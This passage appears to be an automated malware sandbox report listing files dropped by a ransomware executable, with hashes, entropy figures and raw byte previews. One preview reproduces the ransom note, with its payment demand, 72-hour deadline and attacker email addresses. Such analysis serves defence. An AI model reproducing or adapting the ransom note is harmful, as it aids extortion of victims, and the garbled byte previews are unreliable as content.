                                                                                                                                            Preview:..;O.0.-bM.q..!(.....0o......../;.wk..y..N.=.9.k..W..F.-S.w.d.d.."..n.ihu.5....Z61*C...-d.d....9..b ".w......V.....Y.........W.$.... d....'.{....)D#..&...-.*...j..u..[.....C....O..p...r..?."....je.p.]8cr....6.f.. .KI.u:LA.)o.r..."CD..4c&..74..,m#..;[.i.s..r.-....(1..(a-B.;N..S..14.."..@T2..]...Z..fE...n.T..........Y...z....=C..A....t...&......~...0}....}-I.8*{.....{pV...>..3.4VJ_=.M..Lf..J.1jP.`E.P.*..w..\..j.Q.Axr.v.K;..5.#K..J.(.TC....V.:c.U^,.n...i@.s.......>..0Y+.W+Zb(.o...m..-G...&..Y..U.6...l......S..jj...i..........."..H.N.r..u.@!".WqM{Q.....M...N>...w.....R..l...I.1.Z..k"#hJ.C...e.w...}h.:.I..@).,.I.....d|..~\$,.....M...XS..`.M.&.kDk..L....../.....j.&?.Zds&..49.X..I0.P..X..S.....fJ}"..y...O?..u...6.t..W..g.z.xc.........>..{.N#KK...Nbc.....=.J...y..z.r..m....N-.wO.G.h...i]%..:...^.,...yP(B.|...O.4........<,..0|...... ...X.CA.[.(.`%nc.=.ErxFs..R.bD.%.;....<....^.U..W.Qt77...,...~^.A@......x9.).$..~.Z~...Y...r.S\"..<...7,...wdr......r
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.865407299417356
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:mVQwyUbbUeumOzsieeGvJAWWnvnHbnZzQTLCVfnnDkdz5h91NxN5V:G/bbUjjsPPvJARvHjG2VfnnDkdz5lNxJ
                                                                                                                                            MD5:36EB05325F6819E87F0B4D8BD02512E9
                                                                                                                                            SHA1:3B8E4E262D574E13536BBA72D1A7A1198019D025
                                                                                                                                            SHA-256:029337B449CCD5A46510E1A65E498FE311C42DEACA195B686E680AD3930142B1
                                                                                                                                            SHA-512:90A2AF312B8DB805287EE7E800C5837144F354A54A84D0C0EA062BB7BAC6EFC407EB7DCEE8B249F69722D05DAC2095CC38D24A8A7ED9603FD8D8ACD467C82115
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:'B.....J...,.y.........xW......G....7..X.Eh.1.z}.H....X.NC....#..1........u....MT...[]5H.~.!I....i.[A...?...Z].}T{.f8....A.._...<8......z...|.O9..=sYF'|[.Ep|.:.....e.......t..]y...2...0...8.!.....Sm+...m{.. .J.....=....HLXx..f.mIsl...a.%....W..e.HW.@..`..X?..`Y-?T{'...b...zy.....p....*.w;..Y...0V8.L..G.rD.D...........8;q....u.=.....Y.&.W......$...r......S...B.sV..(5.yg...?..n.D.qZ...d<...L~`...#.L..;N7................D*I..}#U.a?..m.A.C.$ .V..}...i.{..P..q.#......L.3G...!...KX.a.~...:$/..=.;...M.8..{B...<(.).R..f....P&...m......v.....".)g.50..T...][|(...v+.M:...L:M!.M..|.?..bV.-.4.......CN..9..p....Ua...5....P.J_.r..S#.i..,..0.... ....q. ....Rq..&.F._.@.9C.Ku1.....:_..x{..h..;4.........7'.tN!...W...s...o8..8.....A%.....'.c..\.....6..7....Pf....\...J..w..Luzc3i.n.......P6....:...Zt.I..z.[..B.%.h..#.C...k..- .=...:....y.g.S.:..]..F.V...M....}Cp.pm%..K.............*..%...n...n...Z.{....3..E....]K..T..h.LDz..y.....i. .n..%,....'mf.V....k..)6..@.L"......U
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.865407299417356
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:mVQwyUbbUeumOzsieeGvJAWWnvnHbnZzQTLCVfnnDkdz5h91NxN5V:G/bbUjjsPPvJARvHjG2VfnnDkdz5lNxJ
                                                                                                                                            MD5:36EB05325F6819E87F0B4D8BD02512E9
                                                                                                                                            SHA1:3B8E4E262D574E13536BBA72D1A7A1198019D025
                                                                                                                                            SHA-256:029337B449CCD5A46510E1A65E498FE311C42DEACA195B686E680AD3930142B1
                                                                                                                                            SHA-512:90A2AF312B8DB805287EE7E800C5837144F354A54A84D0C0EA062BB7BAC6EFC407EB7DCEE8B249F69722D05DAC2095CC38D24A8A7ED9603FD8D8ACD467C82115
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:'B.....J...,.y.........xW......G....7..X.Eh.1.z}.H....X.NC....#..1........u....MT...[]5H.~.!I....i.[A...?...Z].}T{.f8....A.._...<8......z...|.O9..=sYF'|[.Ep|.:.....e.......t..]y...2...0...8.!.....Sm+...m{.. .J.....=....HLXx..f.mIsl...a.%....W..e.HW.@..`..X?..`Y-?T{'...b...zy.....p....*.w;..Y...0V8.L..G.rD.D...........8;q....u.=.....Y.&.W......$...r......S...B.sV..(5.yg...?..n.D.qZ...d<...L~`...#.L..;N7................D*I..}#U.a?..m.A.C.$ .V..}...i.{..P..q.#......L.3G...!...KX.a.~...:$/..=.;...M.8..{B...<(.).R..f....P&...m......v.....".)g.50..T...][|(...v+.M:...L:M!.M..|.?..bV.-.4.......CN..9..p....Ua...5....P.J_.r..S#.i..,..0.... ....q. ....Rq..&.F._.@.9C.Ku1.....:_..x{..h..;4.........7'.tN!...W...s...o8..8.....A%.....'.c..\.....6..7....Pf....\...J..w..Luzc3i.n.......P6....:...Zt.I..z.[..B.%.h..#.C...k..- .=...:....y.g.S.:..]..F.V...M....}Cp.pm%..K.............*..%...n...n...Z.{....3..E....]K..T..h.LDz..y.....i. .n..%,....'mf.V....k..)6..@.L"......U
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:COM executable for DOS
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.853497911244306
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:+pIcY92Z5VDI1AGp4M3JE3irdbhHgA6ahFzcKcaLQZWbFCGTfd8:mDYI5VlGqM328hHkG1nZkZWbsG7d8
                                                                                                                                            MD5:895767C9A4C16253F6D262D4C2B8A7EC
                                                                                                                                            SHA1:9B48ECBA0BE9B2CBCAD79CD3EC7EEE0FCC8DC481
                                                                                                                                            SHA-256:DC24AA2AFB40901DFEFBE3D62F709B3246F4042009290370BD3CE97115C6A3F3
                                                                                                                                            SHA-512:8149BC3B1EA59ADF121C3A25EEA72DA62F6B029BB096998E8601820B8030E00261C9876C3CD864C547062A287BE8C9E0529E92469FB6C5B0B94AFD958006AE35
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:..f.9_.&L.../.....0.S..(*....8Bt.....|0.qI...=..h.-...e....cK......=...V.>x.^.l*.E.....cx^]...}...5=o!...K.e.h....M.tJiM{.:.H..E...j..&.V7.P)..E...#.D........n2.qsWI........l^LA.....4...|r..<.hD"H.G.DN..K...(8.F_......M.FW.T..B|..n..Q.B........./2...*....%....2y...W....>..V~;.TUz 5...V.'E.A7.......C..Q4+./....w6...}..|;..PV...gfZ...C...-R.......Y.gV.W...6..j+.zP..N2_.._.%FQ.@H.&Y.D.....j..........j?.Tl*....A.F. ..&vH.sP]m.8...L.^!.._....bv||.i...[.......<.....u..!.......z..TlL...dn..-38.".....G4>....;...!.c.._..o.(...Y.3...g......l....`@v..8.X..|v3b..^tZV2.R..m.h...$.....C..;y..w..,c.LrV......(.....'.Vo.ii.V....=..s]=9.8..]T..8c[*.Z.-?(...'.....t.9+-Lu...P.d.....W|o..P.....?.3$.`.)...?/..&.......-!G.....jh....'{.tB.5.....~l*.u.x.%...6...f;FR+....q..5(.."?...INH7X."....c...ab...kv.......z..)rd.n..U...I...`..t.<.x...4H@w.J....."%..l..y...$.....U<D|z......V|..H.&.T-.q:..s,s....s..V7..f.6". -.......T..<...4.@.x:.K.......fx.J.d...kJK..P.i
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:COM executable for DOS
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.853497911244306
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:+pIcY92Z5VDI1AGp4M3JE3irdbhHgA6ahFzcKcaLQZWbFCGTfd8:mDYI5VlGqM328hHkG1nZkZWbsG7d8
                                                                                                                                            MD5:895767C9A4C16253F6D262D4C2B8A7EC
                                                                                                                                            SHA1:9B48ECBA0BE9B2CBCAD79CD3EC7EEE0FCC8DC481
                                                                                                                                            SHA-256:DC24AA2AFB40901DFEFBE3D62F709B3246F4042009290370BD3CE97115C6A3F3
                                                                                                                                            SHA-512:8149BC3B1EA59ADF121C3A25EEA72DA62F6B029BB096998E8601820B8030E00261C9876C3CD864C547062A287BE8C9E0529E92469FB6C5B0B94AFD958006AE35
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:..f.9_.&L.../.....0.S..(*....8Bt.....|0.qI...=..h.-...e....cK......=...V.>x.^.l*.E.....cx^]...}...5=o!...K.e.h....M.tJiM{.:.H..E...j..&.V7.P)..E...#.D........n2.qsWI........l^LA.....4...|r..<.hD"H.G.DN..K...(8.F_......M.FW.T..B|..n..Q.B........./2...*....%....2y...W....>..V~;.TUz 5...V.'E.A7.......C..Q4+./....w6...}..|;..PV...gfZ...C...-R.......Y.gV.W...6..j+.zP..N2_.._.%FQ.@H.&Y.D.....j..........j?.Tl*....A.F. ..&vH.sP]m.8...L.^!.._....bv||.i...[.......<.....u..!.......z..TlL...dn..-38.".....G4>....;...!.c.._..o.(...Y.3...g......l....`@v..8.X..|v3b..^tZV2.R..m.h...$.....C..;y..w..,c.LrV......(.....'.Vo.ii.V....=..s]=9.8..]T..8c[*.Z.-?(...'.....t.9+-Lu...P.d.....W|o..P.....?.3$.`.)...?/..&.......-!G.....jh....'{.tB.5.....~l*.u.x.%...6...f;FR+....q..5(.."?...INH7X."....c...ab...kv.......z..)rd.n..U...I...`..t.<.x...4H@w.J....."%..l..y...$.....U<D|z......V|..H.&.T-.q:..s,s....s..V7..f.6". -.......T..<...4.@.x:.K.......fx.J.d...kJK..P.i
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.872800110108246
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:5+hpTEVZu2n/aNkKmgwA8kMFJzU+3lrajULgRsFGhD/34ttr52WIs:5+hCvu2/nKmxJDU+/gRB/4/r5RIs
                                                                                                                                            MD5:9510944A9A7C0B9B2445FB13FD125C9D
                                                                                                                                            SHA1:3B87D54371060E990F98706E9F7079F88A541020
                                                                                                                                            SHA-256:93B2CC6F0D998093AE090324DB1A209EF8D9E227AD49B2E1424B327964BDD677
                                                                                                                                            SHA-512:8BD42E24361F29411E350D87049130C934D6EA301E371B3FEF18D87D23A205F86F47E1171D2F18C1EA87B7B442FDFA2F629C38D82E5918CD573D51D7FC72A1AF
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:/..5.V.D.n..D.?v'.3..(U...6..{...<.p.U..B.E.......q.7..*)t...O...8G....?.t...{.kv.%`......'-=.?.#.....2/.....X.....:T<.Emr.&.g.(......T/_.8...&..1.....H.t.:....~.WF6../.6...r....k7..s.f..T.^.....C.j.7..oY.G..>.`.N0]*.i.*.1.x. .=.#Q.}..?V....A......].~f...).......c.n....v.....ij..L:)...Op8..dUq..>.3.,.q2.w3i.......V5'......Z...?... :(.06.X3..0..U2.F.e..........Sx...x...rU...g+W....u.M.$L.cE...D.J?.Fq....9...Z...s....$/........|..).9._c....Dc.....o"....20#.....e.|........S..E`Y.IJ.A....h.......\.ZV..8.....B...:C....M.;..B.Y.%R.(.....K..!.....U............{E.e...te..^V...l..X..k. .'wk...k.3.s..Fx...9...LO".7wc..D.[A..j&.%_....P........*]..Y..y.0~ ....R.q....H..~Gp..|..dP]z..........S..t.0.h_b.......P:U2H.ub......o....n...%.....]:..C.._.6c.....O...*...m...........tB.G..T.....|.....0m7p..a)Q......]..&..az...>...Q.[....d..@..rs.'.jy....?G.W..?W'.y..Q.Z...x#7..05..=.<........'.Q...3JL....2....c.6..`..m.....K>S7...;g..#..P.M&.../|....;.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.872800110108246
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:5+hpTEVZu2n/aNkKmgwA8kMFJzU+3lrajULgRsFGhD/34ttr52WIs:5+hCvu2/nKmxJDU+/gRB/4/r5RIs
                                                                                                                                            MD5:9510944A9A7C0B9B2445FB13FD125C9D
                                                                                                                                            SHA1:3B87D54371060E990F98706E9F7079F88A541020
                                                                                                                                            SHA-256:93B2CC6F0D998093AE090324DB1A209EF8D9E227AD49B2E1424B327964BDD677
                                                                                                                                            SHA-512:8BD42E24361F29411E350D87049130C934D6EA301E371B3FEF18D87D23A205F86F47E1171D2F18C1EA87B7B442FDFA2F629C38D82E5918CD573D51D7FC72A1AF
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:/..5.V.D.n..D.?v'.3..(U...6..{...<.p.U..B.E.......q.7..*)t...O...8G....?.t...{.kv.%`......'-=.?.#.....2/.....X.....:T<.Emr.&.g.(......T/_.8...&..1.....H.t.:....~.WF6../.6...r....k7..s.f..T.^.....C.j.7..oY.G..>.`.N0]*.i.*.1.x. .=.#Q.}..?V....A......].~f...).......c.n....v.....ij..L:)...Op8..dUq..>.3.,.q2.w3i.......V5'......Z...?... :(.06.X3..0..U2.F.e..........Sx...x...rU...g+W....u.M.$L.cE...D.J?.Fq....9...Z...s....$/........|..).9._c....Dc.....o"....20#.....e.|........S..E`Y.IJ.A....h.......\.ZV..8.....B...:C....M.;..B.Y.%R.(.....K..!.....U............{E.e...te..^V...l..X..k. .'wk...k.3.s..Fx...9...LO".7wc..D.[A..j&.%_....P........*]..Y..y.0~ ....R.q....H..~Gp..|..dP]z..........S..t.0.h_b.......P:U2H.ub......o....n...%.....]:..C.._.6c.....O...*...m...........tB.G..T.....|.....0m7p..a)Q......]..&..az...>...Q.[....d..@..rs.'.jy....?G.W..?W'.y..Q.Z...x#7..05..=.<........'.Q...3JL....2....c.6..`..m.....K>S7...;g..#..P.M&.../|....;.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.837986860746583
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:ZmsaVbtLd1QpS7M55k6r5pUZxh6KcJxydD8rJSXHCqZMqe5xdK6dSGHnJOg+1bS:Zmsa/kpwMrrnUzh6Kyxyp8rkXPZq5nlj
                                                                                                                                            MD5:FA6CCE696D9A8606300733A9B88F95BA
                                                                                                                                            SHA1:3AA3E24A700A47C8886F1EF6953156ED1716413E
                                                                                                                                            SHA-256:D723FDC5A61243C64B968037DC9FAC3F919A712BFC2BDDB8263DC5F03CBAFFD7
                                                                                                                                            SHA-512:202C5C03E1291058F5C1A8148822AB88428DA7DC41298AEE87BEAC0E3E06E2B155B2DC1AF9BB65B1CDA5C188BA23DE5045C6CFCCD38981E3D598612638A5716B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..v..rwZ(v.o..kh3f.......c..rqr.q...0X.h...P....5+t\......\...U...Kj.i]....,...k..D"...?..R...f...........w..v.k.}!x.h1.....(....W.{..t..4M*.Z{...;..x..L0....ZTS...p...L.....o.....R.Yp.BDV..../S.+..X.....f0.0+...&........~.oC/..j.O#..7^...l..<........I...../. .....<.|..5..vz.T...1....c.$.(...sBwx..e....FI.(S....b.<.3.<`<..,....h..|.4...eww|P.....b...2/u...\..]b.TR..R.qqMK.......`..ce.T.>=~...8....h.....{..d.j.j.........n.?.....d.)'O..b.9.8.~KP...x(Y...Yr.m..A..c....._.[$#......E..>O.~..N.K..v.T...l.....O.....Y...LC........D.........c..T.0...\...k.}....o....b..].k..D.....M@}.;..2......q".W..|t...."..A....m..i{m...*a`@D...+}.@..g....K1.D\..W.{.^.07tvvl.jC...>..5!.s.,,r.[.U.6.YX.>?.a..;...l.*{.....4x...m.\a..|$8s...O[a..._...7...^...7.]!.JSJ..}...F./......x....e.g..@E..q....].g...#..v.T{.......6.?.... .:'U!.W.Z.VI..'w#.#......M......k.,../..07$...i.(.Bio.Q5..$.U.u..u..)...Pwu..`....6 .b.F......|E...v.....2B.&.O......$.8.....9..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.837986860746583
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:ZmsaVbtLd1QpS7M55k6r5pUZxh6KcJxydD8rJSXHCqZMqe5xdK6dSGHnJOg+1bS:Zmsa/kpwMrrnUzh6Kyxyp8rkXPZq5nlj
                                                                                                                                            MD5:FA6CCE696D9A8606300733A9B88F95BA
                                                                                                                                            SHA1:3AA3E24A700A47C8886F1EF6953156ED1716413E
                                                                                                                                            SHA-256:D723FDC5A61243C64B968037DC9FAC3F919A712BFC2BDDB8263DC5F03CBAFFD7
                                                                                                                                            SHA-512:202C5C03E1291058F5C1A8148822AB88428DA7DC41298AEE87BEAC0E3E06E2B155B2DC1AF9BB65B1CDA5C188BA23DE5045C6CFCCD38981E3D598612638A5716B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..v..rwZ(v.o..kh3f.......c..rqr.q...0X.h...P....5+t\......\...U...Kj.i]....,...k..D"...?..R...f...........w..v.k.}!x.h1.....(....W.{..t..4M*.Z{...;..x..L0....ZTS...p...L.....o.....R.Yp.BDV..../S.+..X.....f0.0+...&........~.oC/..j.O#..7^...l..<........I...../. .....<.|..5..vz.T...1....c.$.(...sBwx..e....FI.(S....b.<.3.<`<..,....h..|.4...eww|P.....b...2/u...\..]b.TR..R.qqMK.......`..ce.T.>=~...8....h.....{..d.j.j.........n.?.....d.)'O..b.9.8.~KP...x(Y...Yr.m..A..c....._.[$#......E..>O.~..N.K..v.T...l.....O.....Y...LC........D.........c..T.0...\...k.}....o....b..].k..D.....M@}.;..2......q".W..|t...."..A....m..i{m...*a`@D...+}.@..g....K1.D\..W.{.^.07tvvl.jC...>..5!.s.,,r.[.U.6.YX.>?.a..;...l.*{.....4x...m.\a..|$8s...O[a..._...7...^...7.]!.JSJ..}...F./......x....e.g..@E..q....].g...#..v.T{.......6.?.... .:'U!.W.Z.VI..'w#.#......M......k.,../..07$...i.(.Bio.Q5..$.U.u..u..)...Pwu..`....6 .b.F......|E...v.....2B.&.O......$.8.....9..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.847285238536643
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:CpdMUco1ZFI/ZWO02qq0/oCTJ4JRteLh8XK2mYELCYLEW8Qcj/K9yqgspw:GcolYWLq0gC14JRteN8XKURfyFpw
                                                                                                                                            MD5:E9D50616EA200FB37E2FA4873C5A51FF
                                                                                                                                            SHA1:13FF796A27027D825D44355BEB58CA2B81FE140C
                                                                                                                                            SHA-256:CB1D1FBAE5179098FA2BBEC1BF356D9FBD84C49961554887BDB17F1E5BFB7326
                                                                                                                                            SHA-512:88BC7A0655E31CBE69A3A13E4814875B31E0E89094C34F660CCDEBCA8E3B51AB6AB8EE510BBBA9C1F7084095F7C887C1942946E5571E26EF2A8FA85DB343E5B7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.F.-....E&.u..vym79.z..h....q...T....>....x...1?.4`.aM.s..fG.&~zG...~.hy.......wt.....H./..]Z..i.9.\..1$..v..^Q'.$...%...6H#O..I.+...6ug...s.. 0..z}j...du..K.......X@.rLn V]Y...%K.....E^.|~f....Z.:.}_.T`..>..,..#3.C.`.^.4I.B.]..Cm....R...,..Lz.T.'.X[ ...x.......`................/.,E...fP(....U.G4...&...{..u.:.m........n)@..-{..D.T........&....MK.2.)..X}.U.*....p..2.........r."cmc?D\F.jC..a.s{_`Q..NfV..P.^...2V`{.Vu$$..Z.........OF....2......^.....x.....0.1.Y.K}T.B....{..=....*........\...KR..<..K..h.LX._.....`:...Z1.$(.H.fW..~.^..Z..`.B...kQ.4.....Ei.I;a....V..\.:.._Y......nHM....:>..4O^f..b.NF.;.0..y..f.b+........^....-..v.l.X..W.....X.i7PP..B#.J...P.b......k.S.>T.3....X..G..k......2..d.N..;"L...o.d.....;.y.....]..o.S..5...4.....6...j..f...Ra3..r...>.Z5=.T.0....1......>........w..sh..=.r.P.Q....}W...RY.{.G"C.....j.\.7C&q.R..6df.+.'#.1.....^....up.^eSz.ku...5P...\.yO./....b...j..3..%.%J.di....y....<.F...MO%,d.+...WFi...*.......V..pl.......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.847285238536643
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:CpdMUco1ZFI/ZWO02qq0/oCTJ4JRteLh8XK2mYELCYLEW8Qcj/K9yqgspw:GcolYWLq0gC14JRteN8XKURfyFpw
                                                                                                                                            MD5:E9D50616EA200FB37E2FA4873C5A51FF
                                                                                                                                            SHA1:13FF796A27027D825D44355BEB58CA2B81FE140C
                                                                                                                                            SHA-256:CB1D1FBAE5179098FA2BBEC1BF356D9FBD84C49961554887BDB17F1E5BFB7326
                                                                                                                                            SHA-512:88BC7A0655E31CBE69A3A13E4814875B31E0E89094C34F660CCDEBCA8E3B51AB6AB8EE510BBBA9C1F7084095F7C887C1942946E5571E26EF2A8FA85DB343E5B7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.F.-....E&.u..vym79.z..h....q...T....>....x...1?.4`.aM.s..fG.&~zG...~.hy.......wt.....H./..]Z..i.9.\..1$..v..^Q'.$...%...6H#O..I.+...6ug...s.. 0..z}j...du..K.......X@.rLn V]Y...%K.....E^.|~f....Z.:.}_.T`..>..,..#3.C.`.^.4I.B.]..Cm....R...,..Lz.T.'.X[ ...x.......`................/.,E...fP(....U.G4...&...{..u.:.m........n)@..-{..D.T........&....MK.2.)..X}.U.*....p..2.........r."cmc?D\F.jC..a.s{_`Q..NfV..P.^...2V`{.Vu$$..Z.........OF....2......^.....x.....0.1.Y.K}T.B....{..=....*........\...KR..<..K..h.LX._.....`:...Z1.$(.H.fW..~.^..Z..`.B...kQ.4.....Ei.I;a....V..\.:.._Y......nHM....:>..4O^f..b.NF.;.0..y..f.b+........^....-..v.l.X..W.....X.i7PP..B#.J...P.b......k.S.>T.3....X..G..k......2..d.N..;"L...o.d.....;.y.....]..o.S..5...4.....6...j..f...Ra3..r...>.Z5=.T.0....1......>........w..sh..=.r.P.Q....}W...RY.{.G"C.....j.\.7C&q.R..6df.+.'#.1.....^....up.^eSz.ku...5P...\.yO./....b...j..3..%.%J.di....y....<.F...MO%,d.+...WFi...*.......V..pl.......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.864725656968816
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:DrqnRRALHDZ/6VXXoIB3/qtG3wG1A0Nu7ZLp1b4iG8LYiBLeiU20X/:oRRCHiXoIxqE3weAxBbBG8cekv
                                                                                                                                            MD5:D3670C25E94E40CE166893C30136FC63
                                                                                                                                            SHA1:74A2DA774A65C836FBEAC4EBAC9874A20B02AE3E
                                                                                                                                            SHA-256:D83A90B64D9A8831B7560C427881E0B8221A902432AC96B89A6B3F69614E95CA
                                                                                                                                            SHA-512:F3819C32AA232EBF01AC5D843BC1846B2BD2F3B69E3CA2C83E1FE8AF159D1A7D873CAF25DFAA0A6DD73AE1ACACF0C08305E3012D810BF3552741346BDBF26ACD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:$0...Vd..Q=.........o....,.....p.qM....._......X...........<.....b[...3I.!......%.K .....7BLgamv.......n1s...CJ.....7.x.VJ3>..cW..E.z#...yy,]v...@.qg5.U...%2,Q.%.kF.....i..,.5.~.1...uD.E.4...q.....:.......J....'S3.G.u@...Q.9.Z.T.U....EmH.N.O.&.....V..,q|<8.}BY.Q5.....[.......zN{.DX.=.3.b5...3....Y.6.yp.<...;+....\{...C_J...j.#a.y.v.R...1.....N.......4...A..i(...iE..!.....e.,Ld...y|..`.d..".d..y:.if(...U1.........OAZC<DpN../.0.T.n.{I...=.........F..b...u.1@...F$Wb.6?..e.......p5.!....\......C..snKK...t./.1.y.N-.+W.r.Z9./.Y9.u.ed..D}..2...".....[...k...G....,....)&..@T.?~...9........+..NT?........e...N........5\.."l..0gY..B..........]..3~....K......(R.I.xp.j...S>..GR.^......>.....u.=....b...5S<...u.$..T...J..B{m...q..M._......$O..~wB.Y.K<..)iL.~ 8..6....{.Y..x[.~......mC......+.-8a.V.?.}.>...........il.8.*r...u.F~",I.8......x.c.{...>t.."kQ|.[..O...nZT.g]DB.2.D}...nEE.c`.M...."p...rD0&.C..dB=f..1..7zy.-.M#g.c..q.........mI..<$.k........<f5'....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.864725656968816
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:DrqnRRALHDZ/6VXXoIB3/qtG3wG1A0Nu7ZLp1b4iG8LYiBLeiU20X/:oRRCHiXoIxqE3weAxBbBG8cekv
                                                                                                                                            MD5:D3670C25E94E40CE166893C30136FC63
                                                                                                                                            SHA1:74A2DA774A65C836FBEAC4EBAC9874A20B02AE3E
                                                                                                                                            SHA-256:D83A90B64D9A8831B7560C427881E0B8221A902432AC96B89A6B3F69614E95CA
                                                                                                                                            SHA-512:F3819C32AA232EBF01AC5D843BC1846B2BD2F3B69E3CA2C83E1FE8AF159D1A7D873CAF25DFAA0A6DD73AE1ACACF0C08305E3012D810BF3552741346BDBF26ACD
                                                                                                                                            Malicious:false
